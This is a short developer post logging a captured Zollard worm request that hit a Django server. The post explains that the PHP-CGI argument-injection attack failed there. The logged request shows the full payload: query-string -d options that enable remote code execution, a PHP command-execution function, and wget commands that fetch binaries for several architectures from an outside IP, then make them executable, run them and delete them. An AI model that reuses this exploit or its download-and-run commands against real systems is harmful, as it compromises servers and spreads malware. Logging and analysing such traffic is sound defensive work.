@thisisthechris
Created October 16, 2014 12:37
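Nice try: a PHP-CGI argument-injection request (User-Agent "Zollard") aimed at /cgi-bin/php.cgi, but it reached a Django (WSGI) application, so nothing interpreted the `-d` options in the query string or the PHP in the POST body. Django parsed the body as form data, which is why the payload appears split across the QueryDict keys below.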
Request repr():
<WSGIRequest
path:/cgi-bin/php.cgi,
GET:<QueryDict: {u'-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n': [u'']}>,
POST:<QueryDict: {u'chmod x /tmp/x86")': [u''], u'\n $disablefunc ':
[u' explode(",",$disablefunc)'], u'wget -P /tmp
http://178.234.62.207:58455/mips': [u''], u'<?php\necho "Zollard"':
[u''], u'chmod x /tmp/sig")': [u''], u'\nmyshellexec("rm -rf
/tmp/sig': [u''], u'chmod x /tmp/armeabi")': [u''], u'}\n elseif
(($result ': [u' `$cmd`) !== FALSE) {}\n elseif (is_callable("system")
and !in_array("system",$disablefunc)) {$v = @ob_get_contents()'],
u'chmod x /tmp/mipsel")': [u''], u'\nif (!empty($disablefunc))\n{\n
$disablefunc ': [u' str_replace(" ","",$disablefunc)'], u'
passthru($cmd)': [u''], u'\nmyshellexec("rm -rf /tmp/mips': [u''],
u'chmod x /tmp/arm")': [u''], u'\n$disablefunc ': [u'
@ini_get("disable_functions")'], u'\nmyshellexec("rm -rf /tmp/x86':
[u''], u'wget -P /tmp http://178.234.62.207:58455/x86': [u''], u'
system($cmd)': [u''], u'\nmyshellexec("rm -rf /tmp/nodes': [u''], u'\n
$result ': [u' ""'], u'\nmyshellexec("rm -rf /tmp/mipsel': [u''],
u'chmod x /tmp/ppc")': [u''], u'\n?>': [u''], u'\n }\n }\n return
$result': [u''], u'\n}\nfunction myshellexec($cmd)\n{\n global
$disablefunc': [u''], u'/tmp/ppc': [u''], u'chmod x /tmp/nodes")':
[u''], u'")': [u''], u' $result ': [u' join("\\n",$result)', u'
@ob_get_contents()', u' @ob_get_contents()'], u'chmod x /tmp/mips")':
[u''], u'\n}\nmyshellexec("rm -rf /tmp/armeabi': [u''], u'wget -P /tmp
http://178.234.62.207:58455/nodes': [u''], u'/tmp/mipsel': [u''],
u'/tmp/mips': [u''], u'}\n elseif (is_callable("passthru") and
!in_array("passthru",$disablefunc)) {$v ': [u' @ob_get_contents()'],
u'wget -P /tmp http://178.234.62.207:58455/arm': [u''], u'/tmp/x86':
[u''], u'wget -P /tmp http://178.234.62.207:58455/ppc': [u''], u'\n if
(!empty($cmd))\n {\n if (is_callable("exec") and
!in_array("exec",$disablefunc)) {exec($cmd,$result)': [u''], u'wget -P
/tmp http://178.234.62.207:58455/armeabi': [u''], u'\n
while(!feof($fp)) {$result .': [u' fread($fp,1024)'], u'wget -P /tmp
http://178.234.62.207:58455/mipsel': [u''], u'}\n elseif
(is_resource($fp ': [u' popen($cmd,"r")))\n {\n $result = ""'],
u'\nmyshellexec("rm -rf /tmp/ppc': [u''], u'wget -P /tmp
http://178.234.62.207:58455/sig': [u''], u' echo $v': [u'', u''],
u'\nmyshellexec("/tmp/armeabi': [u''], u'/tmp/arm': [u''], u'
@ob_clean()': [u'', u'', u'', u''], u'}\n pclose($fp)': [u''],
u'\nmyshellexec("rm -rf /tmp/arm': [u'']}>,
COOKIES:{},
META:{'CONTENT_LENGTH': '1825',
'CONTENT_TYPE': 'application/x-www-form-urlencoded',
'HTTP_CONNECTION': 'close',
'HTTP_HOST': '146.185.175.141',
'HTTP_USER_AGENT': 'Mozilla/5.0 (compatible; Zollard; Linux)',
'HTTP_X_FORWARDED_FOR': '178.234.62.207',
'HTTP_X_REAL_IP': '178.234.62.207',
'PATH_INFO': u'/cgi-bin/php.cgi',
'QUERY_STRING': '%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E',
'REMOTE_ADDR': '178.234.62.207',
'REQUEST_METHOD': 'POST',
'SCRIPT_NAME': u'',
'SERVER_NAME': '146.185.175.141',
'SERVER_PORT': '80',
'SERVER_PROTOCOL': 'HTTP/1.0',
'wsgi.errors': <open file '<stderr>', mode 'w' at 0x7f83bdda3270>,
'wsgi.input': <_io.BytesIO object at 0x2563530>,
'wsgi.multiprocess': True,
'wsgi.multithread': False,
'wsgi.run_once': False,
'wsgi.url_scheme': 'http',
'wsgi.version': (1, 0)}>